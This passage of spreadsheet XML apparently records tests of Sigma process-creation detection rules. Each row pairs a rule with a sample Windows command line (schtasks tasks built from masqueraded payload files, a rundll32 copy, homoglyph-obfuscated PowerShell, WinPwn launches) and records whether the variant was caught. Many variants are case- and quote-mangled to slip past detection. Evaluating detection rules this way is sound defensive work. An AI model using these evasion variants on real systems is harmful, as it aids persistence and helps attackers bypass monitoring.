      <c r="D1027" s="36" t="inlineStr">
        <is>
          <t>f5d19838-41b5-476c-98d8-ba8af4929ee2</t>
        </is>
      </c>
      <c r="E1027" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Nop -c "[System.IO.File]::Copy('C:\Windows\System32\rundll32.exe', 'C:\Temp\rundll32.exe')"</t>
        </is>
      </c>
      <c r="F1027" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1027" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1027" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1027" s="36" t="n"/>
      <c r="J1027" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1027" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1028" ht="15.75" customHeight="1" s="42">
      <c r="A1028" s="36" t="n"/>
      <c r="B1028" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_homoglyph_cyrillic_lookalikes</t>
        </is>
      </c>
      <c r="C1028" s="36" t="inlineStr">
        <is>
          <t>Potential Homoglyph Attack Using Lookalike Characters</t>
        </is>
      </c>
      <c r="D1028" s="36" t="inlineStr">
        <is>
          <t>32e280f1-8ad4-46ef-9e80-910657611fbc</t>
        </is>
      </c>
      <c r="E1028" s="36" t="inlineStr">
        <is>
          <t>cmd.exe -"c" p�ｽ舜ershell.exe -c "Write-Host 'Test'"</t>
        </is>
      </c>
      <c r="F1028" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1028" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1028" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1028" s="36" t="n"/>
      <c r="J1028" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1028" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1029" ht="15.75" customHeight="1" s="42">
      <c r="A1029" s="36" t="inlineStr">
        <is>
          <t>t1036.005</t>
        </is>
      </c>
      <c r="B1029" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_via_masqueraded_xml_file</t>
        </is>
      </c>
      <c r="C1029" s="36" t="inlineStr">
        <is>
          <t>Suspicious Scheduled Task Creation via Masqueraded XML File</t>
        </is>
      </c>
      <c r="D1029" s="36" t="inlineStr">
        <is>
          <t>dd2a821e-3b07-4d3b-a9ac-929fe4c6ca0c</t>
        </is>
      </c>
      <c r="E1029" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe -create -tn "SuspiciousTask2" -xml "C:\public\payload.bin" -f   # ignored_comment.xml</t>
        </is>
      </c>
      <c r="F1029" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1029" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1029" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1029" s="43" t="n"/>
      <c r="J1029" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K1029" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1030" ht="15.75" customHeight="1" s="42">
      <c r="A1030" s="36" t="inlineStr">
        <is>
          <t>t1036.005</t>
        </is>
      </c>
      <c r="B1030" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_via_masqueraded_xml_file</t>
        </is>
      </c>
      <c r="C1030" s="36" t="inlineStr">
        <is>
          <t>Suspicious Scheduled Task Creation via Masqueraded XML File</t>
        </is>
      </c>
      <c r="D1030" s="36" t="inlineStr">
        <is>
          <t>dd2a821e-3b07-4d3b-a9ac-929fe4c6ca0c</t>
        </is>
      </c>
      <c r="E1030" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /create /tn "MyScheduledTask.xml" /xml C:\Users\Public\hidden_payload.tmp</t>
        </is>
      </c>
      <c r="F1030" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1030" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1030" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1030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30" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1030" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1031" ht="15.75" customHeight="1" s="42">
      <c r="A1031" s="36" t="inlineStr">
        <is>
          <t>t1036.005</t>
        </is>
      </c>
      <c r="B1031" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_via_masqueraded_xml_file</t>
        </is>
      </c>
      <c r="C1031" s="36" t="inlineStr">
        <is>
          <t>Suspicious Scheduled Task Creation via Masqueraded XML File</t>
        </is>
      </c>
      <c r="D1031" s="36" t="inlineStr">
        <is>
          <t>dd2a821e-3b07-4d3b-a9ac-929fe4c6ca0c</t>
        </is>
      </c>
      <c r="E1031" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /"create" /TN "MyScheduledTask.xml" -"xml" C:\Users\Public\hidden_payload.tmp</t>
        </is>
      </c>
      <c r="F1031" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1031" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1031" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1031" s="43" t="n"/>
      <c r="J1031" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1031" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1032" ht="15.75" customHeight="1" s="42">
      <c r="A1032" s="36" t="inlineStr">
        <is>
          <t>t1036.005</t>
        </is>
      </c>
      <c r="B1032" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_via_masqueraded_xml_file</t>
        </is>
      </c>
      <c r="C1032" s="36" t="inlineStr">
        <is>
          <t>Suspicious Scheduled Task Creation via Masqueraded XML File</t>
        </is>
      </c>
      <c r="D1032" s="36" t="inlineStr">
        <is>
          <t>dd2a821e-3b07-4d3b-a9ac-929fe4c6ca0c</t>
        </is>
      </c>
      <c r="E1032" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /"create" /"tn" "MyScheduledTask.xml" /"xml" C:\Users\Public\hidden_payload.tmp</t>
        </is>
      </c>
      <c r="F1032" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1032" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1032" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1032" s="36" t="n"/>
      <c r="J1032" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1032" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1033" ht="15.75" customHeight="1" s="42">
      <c r="A1033" s="36" t="inlineStr">
        <is>
          <t>t1036.005</t>
        </is>
      </c>
      <c r="B1033" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_via_masqueraded_xml_file</t>
        </is>
      </c>
      <c r="C1033" s="36" t="inlineStr">
        <is>
          <t>Suspicious Scheduled Task Creation via Masqueraded XML File</t>
        </is>
      </c>
      <c r="D1033" s="36" t="inlineStr">
        <is>
          <t>dd2a821e-3b07-4d3b-a9ac-929fe4c6ca0c</t>
        </is>
      </c>
      <c r="E1033" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /"create" /"tn" "MyScheduledTask.xml" /xml C:\Users\Public\hidden_payload.tmp</t>
        </is>
      </c>
      <c r="F1033" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1033" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1033" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1033" s="36" t="n"/>
      <c r="J1033" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1033" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1034" ht="15.75" customHeight="1" s="42">
      <c r="A1034" s="36" t="inlineStr">
        <is>
          <t>t1036.005</t>
        </is>
      </c>
      <c r="B1034" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_via_masqueraded_xml_file</t>
        </is>
      </c>
      <c r="C1034" s="36" t="inlineStr">
        <is>
          <t>Suspicious Scheduled Task Creation via Masqueraded XML File</t>
        </is>
      </c>
      <c r="D1034" s="36" t="inlineStr">
        <is>
          <t>dd2a821e-3b07-4d3b-a9ac-929fe4c6ca0c</t>
        </is>
      </c>
      <c r="E1034" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /crEATe -"tn" "MyScheduledTask.xml" /xMl C:\Users\Public\hidden_payload.tmp</t>
        </is>
      </c>
      <c r="F1034" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1034" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1034" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1034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34" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1034" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1035" ht="15.75" customHeight="1" s="42">
      <c r="A1035" s="36" t="inlineStr">
        <is>
          <t>t1036.005</t>
        </is>
      </c>
      <c r="B1035" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_via_masqueraded_xml_file</t>
        </is>
      </c>
      <c r="C1035" s="36" t="inlineStr">
        <is>
          <t>Suspicious Scheduled Task Creation via Masqueraded XML File</t>
        </is>
      </c>
      <c r="D1035" s="36" t="inlineStr">
        <is>
          <t>dd2a821e-3b07-4d3b-a9ac-929fe4c6ca0c</t>
        </is>
      </c>
      <c r="E1035" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /create /tn "MyScheduledTask.xml" /"xml" C:\Users\Public\hidden_payload.tmp</t>
        </is>
      </c>
      <c r="F1035" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1035" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1035" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1035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35" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1035" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1036" ht="15.75" customHeight="1" s="42">
      <c r="A1036" s="36" t="inlineStr">
        <is>
          <t>t1036.005</t>
        </is>
      </c>
      <c r="B1036" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_via_masqueraded_xml_file</t>
        </is>
      </c>
      <c r="C1036" s="36" t="inlineStr">
        <is>
          <t>Suspicious Scheduled Task Creation via Masqueraded XML File</t>
        </is>
      </c>
      <c r="D1036" s="36" t="inlineStr">
        <is>
          <t>dd2a821e-3b07-4d3b-a9ac-929fe4c6ca0c</t>
        </is>
      </c>
      <c r="E1036" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /create /tn "MyScheduledTask.xml" -"xml" C:\Users\Public\hidden_payload.tmp</t>
        </is>
      </c>
      <c r="F1036" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1036" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1036" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1036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36" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1036" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1037" ht="15.75" customHeight="1" s="42">
      <c r="A1037" s="43" t="inlineStr">
        <is>
          <t>t1036.005</t>
        </is>
      </c>
      <c r="B1037" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_via_masqueraded_xml_file</t>
        </is>
      </c>
      <c r="C1037" s="43" t="inlineStr">
        <is>
          <t>Suspicious Scheduled Task Creation via Masqueraded XML File</t>
        </is>
      </c>
      <c r="D1037" s="43" t="inlineStr">
        <is>
          <t>dd2a821e-3b07-4d3b-a9ac-929fe4c6ca0c</t>
        </is>
      </c>
      <c r="E1037" s="43" t="inlineStr">
        <is>
          <t>schtasks.exe /"create" /tn "MyScheduledTask.xml" /XML C:\Users\Public\hidden_payload.tmp</t>
        </is>
      </c>
      <c r="F1037" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1037" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1037" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1037" s="43" t="n"/>
      <c r="J1037" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1037" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1038" ht="15.75" customHeight="1" s="42">
      <c r="A1038" s="36" t="inlineStr">
        <is>
          <t>t1036.005</t>
        </is>
      </c>
      <c r="B1038" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_via_masqueraded_xml_file</t>
        </is>
      </c>
      <c r="C1038" s="36" t="inlineStr">
        <is>
          <t>Suspicious Scheduled Task Creation via Masqueraded XML File</t>
        </is>
      </c>
      <c r="D1038" s="36" t="inlineStr">
        <is>
          <t>dd2a821e-3b07-4d3b-a9ac-929fe4c6ca0c</t>
        </is>
      </c>
      <c r="E1038" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /CREaTE /tn "MyScheduledTask.xml" /xML C:\Users\Public\hidden_payload.tmp</t>
        </is>
      </c>
      <c r="F1038" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1038" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1038" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1038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38" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1038" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1039" ht="15.75" customHeight="1" s="42">
      <c r="A1039" s="36" t="inlineStr">
        <is>
          <t>t1036.005</t>
        </is>
      </c>
      <c r="B1039" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_via_masqueraded_xml_file</t>
        </is>
      </c>
      <c r="C1039" s="36" t="inlineStr">
        <is>
          <t>Suspicious Scheduled Task Creation via Masqueraded XML File</t>
        </is>
      </c>
      <c r="D1039" s="36" t="inlineStr">
        <is>
          <t>dd2a821e-3b07-4d3b-a9ac-929fe4c6ca0c</t>
        </is>
      </c>
      <c r="E1039" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /create /tn "SuspiciousTask" /xml "C:\temp\masqueraded_payload.txt" /f /tr "dummy.xml"</t>
        </is>
      </c>
      <c r="F1039" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1039" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1039" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1039" s="43" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J1039" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1039" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1040" ht="15.75" customHeight="1" s="42">
      <c r="A1040" s="36" t="inlineStr">
        <is>
          <t>t1036.005</t>
        </is>
      </c>
      <c r="B1040" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_via_masqueraded_xml_file</t>
        </is>
      </c>
      <c r="C1040" s="36" t="inlineStr">
        <is>
          <t>Suspicious Scheduled Task Creation via Masqueraded XML File</t>
        </is>
      </c>
      <c r="D1040" s="36" t="inlineStr">
        <is>
          <t>dd2a821e-3b07-4d3b-a9ac-929fe4c6ca0c</t>
        </is>
      </c>
      <c r="E1040" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /crEATE /tn "SuspiciousTask" /xml "C:\temp\masqueraded_payload.txt" /f /tr "dummy.xml"</t>
        </is>
      </c>
      <c r="F1040" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1040" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1040" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1040" s="43" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J1040" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1040" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1041" ht="15.75" customHeight="1" s="42">
      <c r="A1041" s="36" t="inlineStr">
        <is>
          <t>t1036.005</t>
        </is>
      </c>
      <c r="B1041" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_via_masqueraded_xml_file</t>
        </is>
      </c>
      <c r="C1041" s="36" t="inlineStr">
        <is>
          <t>Suspicious Scheduled Task Creation via Masqueraded XML File</t>
        </is>
      </c>
      <c r="D1041" s="36" t="inlineStr">
        <is>
          <t>dd2a821e-3b07-4d3b-a9ac-929fe4c6ca0c</t>
        </is>
      </c>
      <c r="E1041" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /create /tn "SuspiciousTask" /XmL "C:\temp\masqueraded_payload.txt" /f /"tr" "dummy.xml"</t>
        </is>
      </c>
      <c r="F1041" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1041" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1041" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1041" s="36" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J1041" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1041" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1042" ht="15.75" customHeight="1" s="42">
      <c r="A1042" s="36" t="inlineStr">
        <is>
          <t>t1036.005</t>
        </is>
      </c>
      <c r="B1042" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_via_masqueraded_xml_file</t>
        </is>
      </c>
      <c r="C1042" s="36" t="inlineStr">
        <is>
          <t>Suspicious Scheduled Task Creation via Masqueraded XML File</t>
        </is>
      </c>
      <c r="D1042" s="36" t="inlineStr">
        <is>
          <t>dd2a821e-3b07-4d3b-a9ac-929fe4c6ca0c</t>
        </is>
      </c>
      <c r="E1042" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe -"create" /tn "SuspiciousTask" /xml "C:\temp\masqueraded_payload.txt" /f /tr "dummy.xml"</t>
        </is>
      </c>
      <c r="F1042" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1042" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1042" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1042" s="36" t="n"/>
      <c r="J1042" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1042" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1043" ht="15.75" customHeight="1" s="42">
      <c r="A1043" s="36" t="inlineStr">
        <is>
          <t>t1036.005</t>
        </is>
      </c>
      <c r="B1043" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_via_masqueraded_xml_file</t>
        </is>
      </c>
      <c r="C1043" s="36" t="inlineStr">
        <is>
          <t>Suspicious Scheduled Task Creation via Masqueraded XML File</t>
        </is>
      </c>
      <c r="D1043" s="36" t="inlineStr">
        <is>
          <t>dd2a821e-3b07-4d3b-a9ac-929fe4c6ca0c</t>
        </is>
      </c>
      <c r="E1043" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /create /tN "SuspiciousTask" -"xml" "C:\temp\masqueraded_payload.txt" /"f" /tr "dummy.xml"</t>
        </is>
      </c>
      <c r="F1043" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1043" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1043" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1043" s="43" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J1043" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1043" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1044" ht="15.75" customHeight="1" s="42">
      <c r="A1044" s="36" t="inlineStr">
        <is>
          <t>t1036.005</t>
        </is>
      </c>
      <c r="B1044" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_via_masqueraded_xml_file</t>
        </is>
      </c>
      <c r="C1044" s="36" t="inlineStr">
        <is>
          <t>Suspicious Scheduled Task Creation via Masqueraded XML File</t>
        </is>
      </c>
      <c r="D1044" s="36" t="inlineStr">
        <is>
          <t>dd2a821e-3b07-4d3b-a9ac-929fe4c6ca0c</t>
        </is>
      </c>
      <c r="E1044" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /"create" -"tn" "SuspiciousTask" -"xml" "C:\temp\masqueraded_payload.txt" -"f" /tr "dummy.xml"</t>
        </is>
      </c>
      <c r="F1044" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1044" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1044" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1044" s="36" t="n"/>
      <c r="J1044" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1044" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1045" ht="15.75" customHeight="1" s="42">
      <c r="A1045" s="36" t="inlineStr">
        <is>
          <t>t1036.005</t>
        </is>
      </c>
      <c r="B1045" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_via_masqueraded_xml_file</t>
        </is>
      </c>
      <c r="C1045" s="36" t="inlineStr">
        <is>
          <t>Suspicious Scheduled Task Creation via Masqueraded XML File</t>
        </is>
      </c>
      <c r="D1045" s="36" t="inlineStr">
        <is>
          <t>dd2a821e-3b07-4d3b-a9ac-929fe4c6ca0c</t>
        </is>
      </c>
      <c r="E1045" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /CReAtE /tn "SuspiciousTask" /"xml" "C:\temp\masqueraded_payload.txt" /f /tr "dummy.xml"</t>
        </is>
      </c>
      <c r="F1045" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1045" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1045" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1045" s="36" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J1045" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1045" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1046" ht="15.75" customHeight="1" s="42">
      <c r="A1046" s="36" t="inlineStr">
        <is>
          <t>t1036.005</t>
        </is>
      </c>
      <c r="B1046" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_via_masqueraded_xml_file</t>
        </is>
      </c>
      <c r="C1046" s="36" t="inlineStr">
        <is>
          <t>Suspicious Scheduled Task Creation via Masqueraded XML File</t>
        </is>
      </c>
      <c r="D1046" s="36" t="inlineStr">
        <is>
          <t>dd2a821e-3b07-4d3b-a9ac-929fe4c6ca0c</t>
        </is>
      </c>
      <c r="E1046" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /create /tn "SuspiciousTask" /"xml" "C:\temp\masqueraded_payload.txt" /f /tr "dummy.xml"</t>
        </is>
      </c>
      <c r="F1046" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1046" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1046" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1046" s="36" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J1046" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1046" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1047" ht="15.75" customHeight="1" s="42">
      <c r="A1047" s="36" t="inlineStr">
        <is>
          <t>t1036.005</t>
        </is>
      </c>
      <c r="B1047" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_via_masqueraded_xml_file</t>
        </is>
      </c>
      <c r="C1047" s="36" t="inlineStr">
        <is>
          <t>Suspicious Scheduled Task Creation via Masqueraded XML File</t>
        </is>
      </c>
      <c r="D1047" s="36" t="inlineStr">
        <is>
          <t>dd2a821e-3b07-4d3b-a9ac-929fe4c6ca0c</t>
        </is>
      </c>
      <c r="E1047" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /create /"tn" "SuspiciousTask" -"xml" "C:\temp\masqueraded_payload.txt" /f /"tr" "dummy.xml"</t>
        </is>
      </c>
      <c r="F1047" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1047" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1047" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1047" s="43" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J1047" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1047" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1048" ht="15.75" customHeight="1" s="42">
      <c r="A1048" s="43" t="inlineStr">
        <is>
          <t>t1036.005</t>
        </is>
      </c>
      <c r="B1048" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_via_masqueraded_xml_file</t>
        </is>
      </c>
      <c r="C1048" s="43" t="inlineStr">
        <is>
          <t>Suspicious Scheduled Task Creation via Masqueraded XML File</t>
        </is>
      </c>
      <c r="D1048" s="43" t="inlineStr">
        <is>
          <t>dd2a821e-3b07-4d3b-a9ac-929fe4c6ca0c</t>
        </is>
      </c>
      <c r="E1048" s="43" t="inlineStr">
        <is>
          <t>schtasks.exe -"create" /"tn" "SuspiciousTask" /xml "C:\temp\masqueraded_payload.txt" /F /tr "dummy.xml"</t>
        </is>
      </c>
      <c r="F1048" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1048" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1048" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1048" s="43" t="n"/>
      <c r="J1048" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1048" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1049" ht="15.75" customHeight="1" s="42">
      <c r="A1049" s="36" t="inlineStr">
        <is>
          <t>t1036.005</t>
        </is>
      </c>
      <c r="B1049" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_via_masqueraded_xml_file</t>
        </is>
      </c>
      <c r="C1049" s="36" t="inlineStr">
        <is>
          <t>Suspicious Scheduled Task Creation via Masqueraded XML File</t>
        </is>
      </c>
      <c r="D1049" s="36" t="inlineStr">
        <is>
          <t>dd2a821e-3b07-4d3b-a9ac-929fe4c6ca0c</t>
        </is>
      </c>
      <c r="E1049" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /create /tn "SuspiciousTask" -"xml" "C:\temp\masqueraded_payload.txt" /f /TR "dummy.xml"</t>
        </is>
      </c>
      <c r="F1049" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1049" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1049" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1049" s="43" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J1049" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1049" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1050" ht="15.75" customHeight="1" s="42">
      <c r="A1050" s="36" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B1050" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C1050" s="36" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D1050" s="36" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E1050" s="36" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c start "" "C:\Users\Public\WP.exe"</t>
        </is>
      </c>
      <c r="F1050" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G1050" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1050" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1050" s="43" t="n"/>
      <c r="J1050" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K1050" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1051" ht="15.75" customHeight="1" s="42">
      <c r="A1051" s="36" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B1051" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C1051" s="36" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D1051" s="36" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E1051" s="36" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c Start C:\Temp\WinPwn_Tool.exe -recon</t>
        </is>
      </c>
      <c r="F1051" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1051" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1051" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1051" s="36" t="n"/>
      <c r="J1051" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K1051" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1052" ht="15.75" customHeight="1" s="42">
      <c r="A1052" s="36" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B1052" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C1052" s="36" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D1052" s="36" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E1052" s="36" t="inlineStr">
        <is>
